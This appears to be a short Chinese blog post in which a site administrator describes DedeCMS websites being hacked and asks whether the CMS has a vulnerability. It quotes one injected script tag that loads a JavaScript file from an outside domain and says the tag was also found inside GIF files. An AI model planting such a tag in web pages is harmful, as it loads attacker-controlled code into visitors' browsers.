曾经碰到有几个使用DedeCMS的网站被黑客攻击,导致所有的index.*文件被清空。今天又有一个客户的使用DedeCMS网站被人注入了一段代码。不知道是否是DedeCMS存在安全漏洞?
因为两次碰到的都是使用DedeCMS的网站,所以猜测极其可能是DedeCMS存在安全漏洞,导致网站被攻击。不过目前没有任何证据。也请高手如果知道的话,告诉一下。谢谢。
今天客户的网站注入的代码是:
<script src=http://www.google-freed.cn/yanyuan.js></script>
奇怪的是这段代码还在一些GIF文件里存在 。而且这些GIF文件还可以继续用浏览器显示。
You can skip to the end and leave a comment. Pinging is currently not allowed.
